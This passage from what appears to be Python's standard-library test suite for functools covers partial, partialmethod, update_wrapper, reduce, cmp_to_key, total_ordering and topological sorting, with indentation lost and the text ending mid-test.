def test_recursive_repr(self):
if self.partial in (c_functools.partial, py_functools.partial):
name = 'functools.partial'
else:
name = self.partial.__name__
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
try:
self.assertEqual(repr(f), '%s(...)' % (name,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
self.assertEqual(repr(f), '%s(%r, ...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
self.assertEqual(repr(f), '%s(%r, a=...)' % (name, capture,))
finally:
f.__setstate__((capture, (), {}, {}))
def test_pickle(self):
with self.AllowPickle():
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertEqual(signature(f_copy), signature(f))
def test_copy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.copy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIs(f_copy.attr, f.attr)
self.assertIs(f_copy.args, f.args)
self.assertIs(f_copy.keywords, f.keywords)
def test_deepcopy(self):
f = self.partial(signature, ['asdf'], bar=[True])
f.attr = []
f_copy = copy.deepcopy(f)
self.assertEqual(signature(f_copy), signature(f))
self.assertIsNot(f_copy.attr, f.attr)
self.assertIsNot(f_copy.args, f.args)
self.assertIsNot(f_copy.args[0], f.args[0])
self.assertIsNot(f_copy.keywords, f.keywords)
self.assertIsNot(f_copy.keywords['bar'], f.keywords['bar'])
def test_setstate(self):
f = self.partial(signature)
f.__setstate__((capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(signature(f),
(capture, (1,), dict(a=10), dict(attr=[])))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), dict(a=10), None))
self.assertEqual(signature(f), (capture, (1,), dict(a=10), {}))
self.assertEqual(f(2, b=20), ((1, 2), {'a': 10, 'b': 20}))
f.__setstate__((capture, (1,), None, None))
#self.assertEqual(signature(f), (capture, (1,), {}, {}))
self.assertEqual(f(2, b=20), ((1, 2), {'b': 20}))
self.assertEqual(f(2), ((1, 2), {}))
self.assertEqual(f(), ((1,), {}))
f.__setstate__((capture, (), {}, None))
self.assertEqual(signature(f), (capture, (), {}, {}))
self.assertEqual(f(2, b=20), ((2,), {'b': 20}))
self.assertEqual(f(2), ((2,), {}))
self.assertEqual(f(), ((), {}))
def test_setstate_errors(self):
f = self.partial(signature)
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}))
self.assertRaises(TypeError, f.__setstate__, (capture, (), {}, {}, None))
self.assertRaises(TypeError, f.__setstate__, [capture, (), {}, None])
self.assertRaises(TypeError, f.__setstate__, (None, (), {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, None, {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, [], {}, None))
self.assertRaises(TypeError, f.__setstate__, (capture, (), [], None))
def test_setstate_subclasses(self):
f = self.partial(signature)
f.__setstate__((capture, MyTuple((1,)), MyDict(a=10), None))
s = signature(f)
self.assertEqual(s, (capture, (1,), dict(a=10), {}))
self.assertIs(type(s[1]), tuple)
self.assertIs(type(s[2]), dict)
r = f()
self.assertEqual(r, ((1,), {'a': 10}))
self.assertIs(type(r[0]), tuple)
self.assertIs(type(r[1]), dict)
f.__setstate__((capture, BadTuple((1,)), {}, None))
s = signature(f)
self.assertEqual(s, (capture, (1,), {}, {}))
self.assertIs(type(s[1]), tuple)
r = f(2)
self.assertEqual(r, ((1, 2), {}))
self.assertIs(type(r[0]), tuple)
def test_recursive_pickle(self):
with self.AllowPickle():
f = self.partial(capture)
f.__setstate__((f, (), {}, {}))
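            # A partial whose func is itself cannot be reduced without
            # infinite recursion, so pickling must fail with
            # RecursionError under every protocol.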
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.assertRaises(RecursionError):
pickle.dumps(f, proto)
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (f,), {}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.args[0], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
f = self.partial(capture)
f.__setstate__((capture, (), {'a': f}, {}))
try:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
f_copy = pickle.loads(pickle.dumps(f, proto))
try:
self.assertIs(f_copy.keywords['a'], f_copy)
finally:
f_copy.__setstate__((capture, (), {}, {}))
finally:
f.__setstate__((capture, (), {}, {}))
# Issue 6083: Reference counting bug
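    # __setstate__ only accepts a genuine tuple as its state; a merely
    # tuple-like sequence such as BadSequence below must be rejected
    # with TypeError rather than consumed item by item.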
def test_setstate_refcount(self):
class BadSequence:
def __len__(self):
return 4
def __getitem__(self, key):
if key == 0:
return max
elif key == 1:
return tuple(range(1000000))
elif key in (2, 3):
return {}
raise IndexError
f = self.partial(object)
self.assertRaises(TypeError, f.__setstate__, BadSequence())
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialC(TestPartial, unittest.TestCase):
if c_functools:
partial = c_functools.partial
class AllowPickle:
def __enter__(self):
return self
def __exit__(self, type, value, tb):
return False
def test_attributes_unwritable(self):
# attributes should not be writable
p = self.partial(capture, 1, 2, a=10, b=20)
self.assertRaises(AttributeError, setattr, p, 'func', map)
self.assertRaises(AttributeError, setattr, p, 'args', (1, 2))
self.assertRaises(AttributeError, setattr, p, 'keywords', dict(a=1, b=2))
p = self.partial(hex)
try:
del p.__dict__
except TypeError:
pass
else:
self.fail('partial object allowed __dict__ to be deleted')
def test_manually_adding_non_string_keyword(self):
p = self.partial(capture)
# Adding a non-string/unicode keyword to partial kwargs
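        # works because p.keywords is an ordinary mutable dict; repr()
        # must still render the entry, and the eventual call must fail
        # because keyword names have to be strings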
p.keywords[1234] = 'value'
r = repr(p)
self.assertIn('1234', r)
self.assertIn("'value'", r)
with self.assertRaises(TypeError):
p()
def test_keystr_replaces_value(self):
p = self.partial(capture)
class MutatesYourDict(object):
def __str__(self):
p.keywords[self] = ['sth2']
return 'astr'
# Replacing the value during key formatting should keep the original
# value alive (at least long enough).
p.keywords[MutatesYourDict()] = ['sth']
r = repr(p)
self.assertIn('astr', r)
self.assertIn("['sth']", r)
class TestPartialPy(TestPartial, unittest.TestCase):
partial = py_functools.partial
class AllowPickle:
def __init__(self):
self._cm = replaced_module("functools", py_functools)
def __enter__(self):
return self._cm.__enter__()
def __exit__(self, type, value, tb):
return self._cm.__exit__(type, value, tb)
if c_functools:
class CPartialSubclass(c_functools.partial):
pass
class PyPartialSubclass(py_functools.partial):
pass
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestPartialCSubclass(TestPartialC):
if c_functools:
partial = CPartialSubclass
# partial subclasses are not optimized for nested calls
test_nested_optimization = None
class TestPartialPySubclass(TestPartialPy):
partial = PyPartialSubclass
class TestPartialMethod(unittest.TestCase):
class A(object):
nothing = functools.partialmethod(capture)
positional = functools.partialmethod(capture, 1)
keywords = functools.partialmethod(capture, a=2)
both = functools.partialmethod(capture, 3, b=4)
spec_keywords = functools.partialmethod(capture, self=1, func=2)
nested = functools.partialmethod(positional, 5)
over_partial = functools.partialmethod(functools.partial(capture, c=6), 7)
static = functools.partialmethod(staticmethod(capture), 8)
cls = functools.partialmethod(classmethod(capture), d=9)
a = A()
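    # For ordinary partialmethods, attribute access on an instance passes
    # the bound self to capture ahead of the preset arguments; the
    # staticmethod and classmethod variants bind nothing or the class
    # respectively, as the tests below check.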
def test_arg_combinations(self):
self.assertEqual(self.a.nothing(), ((self.a,), {}))
self.assertEqual(self.a.nothing(5), ((self.a, 5), {}))
self.assertEqual(self.a.nothing(c=6), ((self.a,), {'c': 6}))
self.assertEqual(self.a.nothing(5, c=6), ((self.a, 5), {'c': 6}))
self.assertEqual(self.a.positional(), ((self.a, 1), {}))
self.assertEqual(self.a.positional(5), ((self.a, 1, 5), {}))
self.assertEqual(self.a.positional(c=6), ((self.a, 1), {'c': 6}))
self.assertEqual(self.a.positional(5, c=6), ((self.a, 1, 5), {'c': 6}))
self.assertEqual(self.a.keywords(), ((self.a,), {'a': 2}))
self.assertEqual(self.a.keywords(5), ((self.a, 5), {'a': 2}))
self.assertEqual(self.a.keywords(c=6), ((self.a,), {'a': 2, 'c': 6}))
self.assertEqual(self.a.keywords(5, c=6), ((self.a, 5), {'a': 2, 'c': 6}))
self.assertEqual(self.a.both(), ((self.a, 3), {'b': 4}))
self.assertEqual(self.a.both(5), ((self.a, 3, 5), {'b': 4}))
self.assertEqual(self.a.both(c=6), ((self.a, 3), {'b': 4, 'c': 6}))
self.assertEqual(self.a.both(5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.A.both(self.a, 5, c=6), ((self.a, 3, 5), {'b': 4, 'c': 6}))
self.assertEqual(self.a.spec_keywords(), ((self.a,), {'self': 1, 'func': 2}))
def test_nested(self):
self.assertEqual(self.a.nested(), ((self.a, 1, 5), {}))
self.assertEqual(self.a.nested(6), ((self.a, 1, 5, 6), {}))
self.assertEqual(self.a.nested(d=7), ((self.a, 1, 5), {'d': 7}))
self.assertEqual(self.a.nested(6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
self.assertEqual(self.A.nested(self.a, 6, d=7), ((self.a, 1, 5, 6), {'d': 7}))
def test_over_partial(self):
self.assertEqual(self.a.over_partial(), ((self.a, 7), {'c': 6}))
self.assertEqual(self.a.over_partial(5), ((self.a, 7, 5), {'c': 6}))
self.assertEqual(self.a.over_partial(d=8), ((self.a, 7), {'c': 6, 'd': 8}))
self.assertEqual(self.a.over_partial(5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
self.assertEqual(self.A.over_partial(self.a, 5, d=8), ((self.a, 7, 5), {'c': 6, 'd': 8}))
def test_bound_method_introspection(self):
obj = self.a
self.assertIs(obj.both.__self__, obj)
self.assertIs(obj.nested.__self__, obj)
self.assertIs(obj.over_partial.__self__, obj)
self.assertIs(obj.cls.__self__, self.A)
self.assertIs(self.A.cls.__self__, self.A)
def test_unbound_method_retrieval(self):
obj = self.A
self.assertFalse(hasattr(obj.both, "__self__"))
self.assertFalse(hasattr(obj.nested, "__self__"))
self.assertFalse(hasattr(obj.over_partial, "__self__"))
self.assertFalse(hasattr(obj.static, "__self__"))
self.assertFalse(hasattr(self.a.static, "__self__"))
def test_descriptors(self):
for obj in [self.A, self.a]:
with self.subTest(obj=obj):
self.assertEqual(obj.static(), ((8,), {}))
self.assertEqual(obj.static(5), ((8, 5), {}))
self.assertEqual(obj.static(d=8), ((8,), {'d': 8}))
self.assertEqual(obj.static(5, d=8), ((8, 5), {'d': 8}))
self.assertEqual(obj.cls(), ((self.A,), {'d': 9}))
self.assertEqual(obj.cls(5), ((self.A, 5), {'d': 9}))
self.assertEqual(obj.cls(c=8), ((self.A,), {'c': 8, 'd': 9}))
self.assertEqual(obj.cls(5, c=8), ((self.A, 5), {'c': 8, 'd': 9}))
def test_overriding_keywords(self):
self.assertEqual(self.a.keywords(a=3), ((self.a,), {'a': 3}))
self.assertEqual(self.A.keywords(self.a, a=3), ((self.a,), {'a': 3}))
def test_invalid_args(self):
with self.assertRaises(TypeError):
class B(object):
method = functools.partialmethod(None, 1)
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod()
with self.assertRaises(TypeError):
class B:
method = functools.partialmethod(func=capture, a=1)
def test_repr(self):
self.assertEqual(repr(vars(self.A)['both']),
'functools.partialmethod({}, 3, b=4)'.format(capture))
def test_abstract(self):
class Abstract(abc.ABCMeta):
@abc.abstractmethod
def add(self, x, y):
pass
add5 = functools.partialmethod(add, 5)
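        # partialmethod copies __isabstractmethod__ from the wrapped
        # callable, so add5 is abstract exactly because add is.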
self.assertTrue(Abstract.add.__isabstractmethod__)
self.assertTrue(Abstract.add5.__isabstractmethod__)
for func in [self.A.static, self.A.cls, self.A.over_partial, self.A.nested, self.A.both]:
self.assertFalse(getattr(func, '__isabstractmethod__', False))
def test_positional_only(self):
def f(a, b, /):
return a + b
p = functools.partial(f, 1)
self.assertEqual(p(2), f(1, 2))
class TestUpdateWrapper(unittest.TestCase):
def check_wrapper(self, wrapper, wrapped,
assigned=functools.WRAPPER_ASSIGNMENTS,
updated=functools.WRAPPER_UPDATES):
# Check attributes were assigned
for name in assigned:
self.assertIs(getattr(wrapper, name), getattr(wrapped, name))
# Check attributes were updated
for name in updated:
wrapper_attr = getattr(wrapper, name)
wrapped_attr = getattr(wrapped, name)
for key in wrapped_attr:
if name == "__dict__" and key == "__wrapped__":
# __wrapped__ is overwritten by the update code
continue
self.assertIs(wrapped_attr[key], wrapper_attr[key])
# Check __wrapped__
self.assertIs(wrapper.__wrapped__, wrapped)
def _default_update(self):
def f(a:'This is a new annotation'):
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is a bald faced lie"
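        # update_wrapper must replace this bogus __wrapped__ with f
        # itself, which check_wrapper verifies.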
def wrapper(b:'This is the prior annotation'):
pass
functools.update_wrapper(wrapper, f)
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertIs(wrapper.__wrapped__, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
self.assertEqual(wrapper.__annotations__['a'], 'This is a new annotation')
self.assertNotIn('b', wrapper.__annotations__)
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, f = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
def wrapper():
pass
functools.update_wrapper(wrapper, f, (), ())
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.__annotations__, {})
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
functools.update_wrapper(wrapper, f, assign, update)
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
def test_missing_attributes(self):
def f():
pass
def wrapper():
pass
wrapper.dict_attr = {}
assign = ('attr',)
update = ('dict_attr',)
# Missing attributes on wrapped object are ignored
functools.update_wrapper(wrapper, f, assign, update)
self.assertNotIn('attr', wrapper.__dict__)
self.assertEqual(wrapper.dict_attr, {})
# Wrapper must have expected attributes for updating
del wrapper.dict_attr
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
wrapper.dict_attr = 1
with self.assertRaises(AttributeError):
functools.update_wrapper(wrapper, f, assign, update)
@support.requires_docstrings
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_builtin_update(self):
# Test for bug #1576241
def wrapper():
pass
functools.update_wrapper(wrapper, max)
self.assertEqual(wrapper.__name__, 'max')
self.assertTrue(wrapper.__doc__.startswith('max('))
self.assertEqual(wrapper.__annotations__, {})
class TestWraps(TestUpdateWrapper):
def _default_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
f.__wrapped__ = "This is still a bald faced lie"
@functools.wraps(f)
def wrapper():
pass
return wrapper, f
def test_default_update(self):
wrapper, f = self._default_update()
self.check_wrapper(wrapper, f)
self.assertEqual(wrapper.__name__, 'f')
self.assertEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.attr, 'This is also a test')
@unittest.skipIf(sys.flags.optimize >= 2,
"Docstrings are omitted with -O2 and above")
def test_default_update_doc(self):
wrapper, _ = self._default_update()
self.assertEqual(wrapper.__doc__, 'This is a test')
def test_no_update(self):
def f():
"""This is a test"""
pass
f.attr = 'This is also a test'
@functools.wraps(f, (), ())
def wrapper():
pass
self.check_wrapper(wrapper, f, (), ())
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertFalse(hasattr(wrapper, 'attr'))
def test_selective_update(self):
def f():
pass
f.attr = 'This is a different test'
f.dict_attr = dict(a=1, b=2, c=3)
def add_dict_attr(f):
f.dict_attr = {}
return f
assign = ('attr',)
update = ('dict_attr',)
@functools.wraps(f, assign, update)
@add_dict_attr
def wrapper():
pass
self.check_wrapper(wrapper, f, assign, update)
self.assertEqual(wrapper.__name__, 'wrapper')
self.assertNotEqual(wrapper.__qualname__, f.__qualname__)
self.assertEqual(wrapper.__doc__, None)
self.assertEqual(wrapper.attr, 'This is a different test')
self.assertEqual(wrapper.dict_attr, f.dict_attr)
class TestReduce:
def test_reduce(self):
class Squares:
def __init__(self, max):
self.max = max
self.sofar = []
def __len__(self):
return len(self.sofar)
def __getitem__(self, i):
if not 0 <= i < self.max: raise IndexError
n = len(self.sofar)
while n <= i:
self.sofar.append(n*n)
n += 1
return self.sofar[i]
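        # Squares(10) lazily yields 0, 1, 4, ..., 81, which sum to 285;
        # the reduce() calls below rely on that total.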
def add(x, y):
return x + y
self.assertEqual(self.reduce(add, ['a', 'b', 'c'], ''), 'abc')
self.assertEqual(
self.reduce(add, [['a', 'c'], [], ['d', 'w']], []),
['a','c','d','w']
)
self.assertEqual(self.reduce(lambda x, y: x*y, range(2,8), 1), 5040)
self.assertEqual(
self.reduce(lambda x, y: x*y, range(2,21), 1),
2432902008176640000
)
self.assertEqual(self.reduce(add, Squares(10)), 285)
self.assertEqual(self.reduce(add, Squares(10), 0), 285)
self.assertEqual(self.reduce(add, Squares(0), 0), 0)
self.assertRaises(TypeError, self.reduce)
self.assertRaises(TypeError, self.reduce, 42, 42)
self.assertRaises(TypeError, self.reduce, 42, 42, 42)
self.assertEqual(self.reduce(42, "1"), "1") # func is never called with one item
self.assertEqual(self.reduce(42, "", "1"), "1") # func is never called with one item
self.assertRaises(TypeError, self.reduce, 42, (42, 42))
        self.assertRaises(TypeError, self.reduce, add, []) # arg 2 must not be an empty sequence when no initial value is given
self.assertRaises(TypeError, self.reduce, add, "")
self.assertRaises(TypeError, self.reduce, add, ())
self.assertRaises(TypeError, self.reduce, add, object())
class TestFailingIter:
def __iter__(self):
raise RuntimeError
self.assertRaises(RuntimeError, self.reduce, add, TestFailingIter())
self.assertEqual(self.reduce(add, [], None), None)
self.assertEqual(self.reduce(add, [], 42), 42)
class BadSeq:
def __getitem__(self, index):
raise ValueError
self.assertRaises(ValueError, self.reduce, 42, BadSeq())
# Test reduce()'s use of iterators.
def test_iterator_usage(self):
class SequenceClass:
def __init__(self, n):
self.n = n
def __getitem__(self, i):
if 0 <= i < self.n:
return i
else:
raise IndexError
from operator import add
self.assertEqual(self.reduce(add, SequenceClass(5)), 10)
self.assertEqual(self.reduce(add, SequenceClass(5), 42), 52)
self.assertRaises(TypeError, self.reduce, add, SequenceClass(0))
self.assertEqual(self.reduce(add, SequenceClass(0), 42), 42)
self.assertEqual(self.reduce(add, SequenceClass(1)), 0)
self.assertEqual(self.reduce(add, SequenceClass(1), 42), 42)
d = {"one": 1, "two": 2, "three": 3}
self.assertEqual(self.reduce(add, d), "".join(d.keys()))
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestReduceC(TestReduce, unittest.TestCase):
if c_functools:
reduce = c_functools.reduce
class TestReducePy(TestReduce, unittest.TestCase):
reduce = staticmethod(py_functools.reduce)
class TestCmpToKey:
def test_cmp_to_key(self):
def cmp1(x, y):
return (x > y) - (x < y)
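        # cmp_to_key wraps an old-style three-way comparison in a key
        # object whose rich comparisons delegate to it, e.g.
        #     sorted([3, 1, 2], key=functools.cmp_to_key(cmp1))  # [1, 2, 3]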
key = self.cmp_to_key(cmp1)
self.assertEqual(key(3), key(3))
self.assertGreater(key(3), key(1))
self.assertGreaterEqual(key(3), key(3))
def cmp2(x, y):
return int(x) - int(y)
key = self.cmp_to_key(cmp2)
self.assertEqual(key(4.0), key('4'))
self.assertLess(key(2), key('35'))
self.assertLessEqual(key(2), key('35'))
self.assertNotEqual(key(2), key('35'))
def test_cmp_to_key_arguments(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(obj=3), key(obj=3))
self.assertGreater(key(obj=3), key(obj=1))
with self.assertRaises((TypeError, AttributeError)):
key(3) > 1 # rhs is not a K object
with self.assertRaises((TypeError, AttributeError)):
1 < key(3) # lhs is not a K object
with self.assertRaises(TypeError):
key = self.cmp_to_key() # too few args
with self.assertRaises(TypeError):
key = self.cmp_to_key(cmp1, None) # too many args
key = self.cmp_to_key(cmp1)
with self.assertRaises(TypeError):
key() # too few args
with self.assertRaises(TypeError):
key(None, None) # too many args
def test_bad_cmp(self):
def cmp1(x, y):
raise ZeroDivisionError
key = self.cmp_to_key(cmp1)
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
class BadCmp:
def __lt__(self, other):
raise ZeroDivisionError
def cmp1(x, y):
return BadCmp()
with self.assertRaises(ZeroDivisionError):
key(3) > key(1)
def test_obj_field(self):
def cmp1(x, y):
return (x > y) - (x < y)
key = self.cmp_to_key(mycmp=cmp1)
self.assertEqual(key(50).obj, 50)
def test_sort_int(self):
def mycmp(x, y):
return y - x
self.assertEqual(sorted(range(5), key=self.cmp_to_key(mycmp)),
[4, 3, 2, 1, 0])
def test_sort_int_str(self):
def mycmp(x, y):
x, y = int(x), int(y)
return (x > y) - (x < y)
values = [5, '3', 7, 2, '0', '1', 4, '10', 1]
values = sorted(values, key=self.cmp_to_key(mycmp))
self.assertEqual([int(value) for value in values],
[0, 1, 1, 2, 3, 4, 5, 7, 10])
def test_hash(self):
def mycmp(x, y):
return y - x
key = self.cmp_to_key(mycmp)
k = key(10)
self.assertRaises(TypeError, hash, k)
self.assertNotIsInstance(k, collections.abc.Hashable)
@unittest.skipUnless(c_functools, 'requires the C _functools module')
class TestCmpToKeyC(TestCmpToKey, unittest.TestCase):
if c_functools:
cmp_to_key = c_functools.cmp_to_key
class TestCmpToKeyPy(TestCmpToKey, unittest.TestCase):
cmp_to_key = staticmethod(py_functools.cmp_to_key)
class TestTotalOrdering(unittest.TestCase):
def test_total_ordering_lt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
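        # total_ordering derives __gt__, __le__ and __ge__ from the
        # __lt__/__eq__ pair defined above (e.g. a > b is computed as
        # (not a < b) and (a != b)), which the assertions verify.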
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) > A(2))
def test_total_ordering_le(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __le__(self, other):
return self.value <= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(1) >= A(2))
def test_total_ordering_gt(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __gt__(self, other):
return self.value > other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) < A(1))
def test_total_ordering_ge(self):
@functools.total_ordering
class A:
def __init__(self, value):
self.value = value
def __ge__(self, other):
return self.value >= other.value
def __eq__(self, other):
return self.value == other.value
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
self.assertFalse(A(2) <= A(1))
def test_total_ordering_no_overwrite(self):
# new methods should not overwrite existing
@functools.total_ordering
class A(int):
pass
self.assertTrue(A(1) < A(2))
self.assertTrue(A(2) > A(1))
self.assertTrue(A(1) <= A(2))
self.assertTrue(A(2) >= A(1))
self.assertTrue(A(2) <= A(2))
self.assertTrue(A(2) >= A(2))
def test_no_operations_defined(self):
with self.assertRaises(ValueError):
@functools.total_ordering
class A:
pass
def test_type_error_when_not_implemented(self):
# bug 10042; ensure stack overflow does not occur
# when decorated types return NotImplemented
@functools.total_ordering
class ImplementsLessThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value == other.value
return False
def __lt__(self, other):
if isinstance(other, ImplementsLessThan):
return self.value < other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThan:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value == other.value
return False
def __gt__(self, other):
if isinstance(other, ImplementsGreaterThan):
return self.value > other.value
return NotImplemented
@functools.total_ordering
class ImplementsLessThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value == other.value
return False
def __le__(self, other):
if isinstance(other, ImplementsLessThanEqualTo):
return self.value <= other.value
return NotImplemented
@functools.total_ordering
class ImplementsGreaterThanEqualTo:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value == other.value
return False
def __ge__(self, other):
if isinstance(other, ImplementsGreaterThanEqualTo):
return self.value >= other.value
return NotImplemented
@functools.total_ordering
class ComparatorNotImplemented:
def __init__(self, value):
self.value = value
def __eq__(self, other):
if isinstance(other, ComparatorNotImplemented):
return self.value == other.value
return False
def __lt__(self, other):
return NotImplemented
with self.subTest("LT < 1"), self.assertRaises(TypeError):
ImplementsLessThan(-1) < 1
with self.subTest("LT < LE"), self.assertRaises(TypeError):
ImplementsLessThan(0) < ImplementsLessThanEqualTo(0)
with self.subTest("LT < GT"), self.assertRaises(TypeError):
ImplementsLessThan(1) < ImplementsGreaterThan(1)
with self.subTest("LE <= LT"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(2) <= ImplementsLessThan(2)
with self.subTest("LE <= GE"), self.assertRaises(TypeError):
ImplementsLessThanEqualTo(3) <= ImplementsGreaterThanEqualTo(3)
with self.subTest("GT > GE"), self.assertRaises(TypeError):
ImplementsGreaterThan(4) > ImplementsGreaterThanEqualTo(4)
with self.subTest("GT > LT"), self.assertRaises(TypeError):
ImplementsGreaterThan(5) > ImplementsLessThan(5)
with self.subTest("GE >= GT"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(6) >= ImplementsGreaterThan(6)
with self.subTest("GE >= LE"), self.assertRaises(TypeError):
ImplementsGreaterThanEqualTo(7) >= ImplementsLessThanEqualTo(7)
with self.subTest("GE when equal"):
a = ComparatorNotImplemented(8)
b = ComparatorNotImplemented(8)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a >= b
with self.subTest("LE when equal"):
a = ComparatorNotImplemented(9)
b = ComparatorNotImplemented(9)
self.assertEqual(a, b)
with self.assertRaises(TypeError):
a <= b
def test_pickle(self):
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
for name in '__lt__', '__gt__', '__le__', '__ge__':
with self.subTest(method=name, proto=proto):
method = getattr(Orderable_LT, name)
method_copy = pickle.loads(pickle.dumps(method, proto))
self.assertIs(method_copy, method)
@functools.total_ordering
class Orderable_LT:
def __init__(self, value):
self.value = value
def __lt__(self, other):
return self.value < other.value
def __eq__(self, other):
return self.value == other.value
class TestTopologicalSort(unittest.TestCase):
def _test_graph(self, graph, expected):
def static_order_with_groups(ts):
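            # Drive the prepare()/get_ready()/done() protocol by hand,
            # yielding each batch of ready nodes as one group.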
ts.prepare()
while ts.is_active():
nodes = ts.get_ready()
for node in nodes:
ts.done(node)
yield nodes
ts = functools.TopologicalSorter(graph)
self.assertEqual(list(static_order_with_groups(ts)), list(expected))
ts = functools.TopologicalSorter(graph)
self.assertEqual(list(ts.static_order()), list(chain(*expected)))
def _assert_cycle(self, graph, cycle):
ts = functools.TopologicalSorter()
for node, dependson in graph.items():
ts.add(node, *dependson)
try:
ts.prepare()
except functools.CycleError as e:
msg, seq = e.args
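            # The cycle may be reported starting from any of its nodes,
            # so doubling seq lets the expected cycle match any rotation.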
self.assertIn(' '.join(map(str, cycle)),
' '.join(map(str, seq * 2)))
        else:
            self.fail("CycleError was not raised")
def test_simple_cases(self):
self._test_graph(
{2: {11},
9: {11, 8},
10: {11, 3},
11: {7, 5},
8: {7, 3}},
[(3, 5, 7), (11, 8), (2, 10, 9)]
)
self._test_graph({1: {}}, [(1,)])
self._test_graph({x: {x+1} for x in range(10)},
[(x,) for x in range(10, -1, -1)])
self._test_graph({2: {3}, 3: {4}, 4: {5}, 5: {1},
11: {12}, 12: {13}, 13: {14}, 14: {15}},
[(1, 15), (5, 14), (4, 13), (3, 12), (2, 11)])
self._test_graph({
0: [1, 2],
1: [3],
2: [5, 6],
3: [4],
